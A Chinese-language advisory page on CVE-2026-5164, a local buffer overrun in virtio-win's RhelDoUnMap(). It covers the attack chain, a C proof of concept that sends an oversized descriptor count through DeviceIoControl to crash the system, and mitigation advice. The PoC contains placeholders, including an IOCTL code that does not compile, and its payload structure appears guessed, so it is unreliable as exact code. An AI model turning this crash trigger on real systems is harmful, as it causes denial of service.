CVE-2026-5164 CVSS 6.7 中危

CVE-2026-5164 virtio-win缓冲区溢出漏洞

披露日期: 2026-03-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5164

漏洞类型

缓冲区溢出

CVSS评分

6.7 中危

攻击向量

本地 (AV:L)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

virtio-win

漏洞概述

virtio-win组件中的RhelDoUnMap()函数存在一处严重的输入验证漏洞，该函数未能正确校验用户在取消映射请求中提供的描述符具体数量。本地具有高权限的攻击者可利用该漏洞，通过恶意提供过量的描述符数据导致缓冲区溢出，进而触发系统崩溃及拒绝服务，严重影响系统稳定性与安全性。

技术细节

该漏洞源于virtio-win驱动程序中RhelDoUnMap()函数对输入参数的校验逻辑缺失。在处理取消映射请求时，该函数直接使用用户提供的描述符数量值，而未对该数值进行边界检查或有效性验证。攻击者需具备本地高权限，通过构造特制的I/O控制请求，将一个异常大的描述符数量传递给该函数。由于缺乏校验，程序在后续处理中会尝试访问超出预定缓冲区范围的内存区域，导致缓冲区溢出。这种内存破坏行为不仅可能覆盖关键数据结构，还会触发异常处理机制，最终导致系统崩溃或死机，实现拒绝服务攻击，严重影响业务连续性。

攻击链分析

STEP 1

获取访问权限

攻击者在目标系统上获得本地高权限，能够访问并调用virtio-win驱动接口。

STEP 2

构造恶意数据

攻击者编写程序，构造一个包含超大数量描述符的取消映射请求结构体。

STEP 3

发送请求

通过系统调用或IOCTL将恶意数据包传递给内核态的RhelDoUnMap()函数。

STEP 4

触发溢出

函数未校验描述符数量直接处理，导致缓冲区溢出，破坏内存并引发系统崩溃。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2026-5164
// This code demonstrates triggering the buffer overrun in virtio-win by sending
// an unmap request with an excessive number of descriptors.
// Note: Requires local high privileges and specific driver environment.

#include <windows.h>
#include <stdio.h>

int main() {
    HANDLE hDevice;
    DWORD bytesReturned;
    // Placeholder for actual device path
    char devicePath[] = "\\\\.\\VirtIODevice"; 
    // Placeholder for actual UnMap IOCTL code
    DWORD ioctlCode = 0xXXXX; 

    // Open a handle to the vulnerable driver
    hDevice = CreateFileA(devicePath, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("Failed to open device. Error: %d\n", GetLastError());
        return 1;
    }

    // Structure representing the unmap payload
    typedef struct _UNMAP_PAYLOAD {
        ULONG DescriptorCount; 
        PVOID Descriptors;
    } UNMAP_PAYLOAD;

    UNMAP_PAYLOAD payload;
    // Set an abnormally high number to trigger the overflow
    payload.DescriptorCount = 0xFFFFFFFF; 
    payload.Descriptors = NULL;

    printf("Sending malicious payload to trigger buffer overrun...\n");

    // Send the IOCTL request
    BOOL result = DeviceIoControl(
        hDevice,
        ioctlCode,
        &payload,
        sizeof(payload),
        NULL,
        0,
        &bytesReturned,
        NULL
    );

    if (!result) {
        printf("DeviceIoControl failed. Error: %d\n", GetLastError());
    } else {
        printf("Payload sent successfully. System may crash.\n");
    }

    CloseHandle(hDevice);
    return 0;
}

影响范围

virtio-win (修复前的特定版本)

防御指南

临时缓解措施

建议立即更新virtio-win驱动程序。在无法立即更新的情况下，应严格限制本地管理员权限，避免运行不可信的代码，并及时关注Red Hat等官方机构发布的安全通告。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表